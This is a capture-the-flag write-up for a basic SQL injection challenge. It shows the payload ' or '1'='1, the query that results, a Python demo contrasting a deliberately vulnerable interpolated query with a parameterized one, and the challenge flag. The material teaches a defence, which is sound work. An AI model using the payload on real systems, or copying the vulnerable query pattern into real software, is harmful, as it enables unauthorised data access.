As the name suggests, the purpose of this challenge is to showcase a basic SQL injection attack.

As shown below, the challenge website displays the actual SQL code of the query, together with the resulting query built in real time from the user input.

Start page of the challenge

The first step is to check whether the input to the query is sanitized. This can be done by trying to manipulate the query with special SQL characters such as the single quote (') character. A basic input to check is

' or '1'='1

If the input is not sanitized, this results in a query like

# The original query
SELECT * FROM webfour.webfour where name = '$input'

# $input= ' or '1'='1 resulting in
SELECT * FROM webfour.webfour where name = '' or '1'='1'
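To show why the second query returns every row, here is an added example (not part of the original writeup) that builds the challenge's query both ways: by string interpolation, as the challenge does, and as a parameterized query. It uses an in-memory SQLite table named webfour with constructed sample rows (the schema prefix webfour. is dropped because SQLite has no such schema).

```python
import sqlite3

# Constructed sample rows standing in for the challenge's webfour table.
ROWS = [
    (1, "alice", "not the flag"),
    (2, "bob", "still not the flag"),
    (3, "admin", "FLAG{placeholder}"),
]


def make_db():
    """Create an in-memory table that mirrors the challenge's table shape."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE webfour (id INTEGER, name TEXT, data TEXT)")
    conn.executemany("INSERT INTO webfour VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, user_input):
    """Build the query the way the challenge does: the input is pasted into the SQL text."""
    query = f"SELECT * FROM webfour WHERE name = '{user_input}'"
    # With user_input = ' or '1'='1 this becomes:
    # SELECT * FROM webfour WHERE name = '' or '1'='1'
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_input):
    """Parameterized version: the value is sent separately from the SQL text,
    so a quote inside user_input is just data and never changes the grammar."""
    return conn.execute(
        "SELECT * FROM webfour WHERE name = ?", (user_input,)
    ).fetchall()


def compare(user_input):
    """Return (rows from the vulnerable query, rows from the safe query) for one input."""
    conn = make_db()
    return len(vulnerable_lookup(conn, user_input)), len(safe_lookup(conn, user_input))


if __name__ == "__main__":
    print("normal input  :", compare("alice"))          # (1, 1)
    print("injected input:", compare("' or '1'='1"))   # (3, 0)
```

The vulnerable lookup returns all three rows for the injected input, while the parameterized lookup returns none, because it looks for a name literally equal to the payload string.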

After submitting the described input on the challenge website, it can be seen that the input is not sanitized, so the query returns the data of the whole 'webfour' table.

Successful SQL injection on the website

This gives us the flag CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}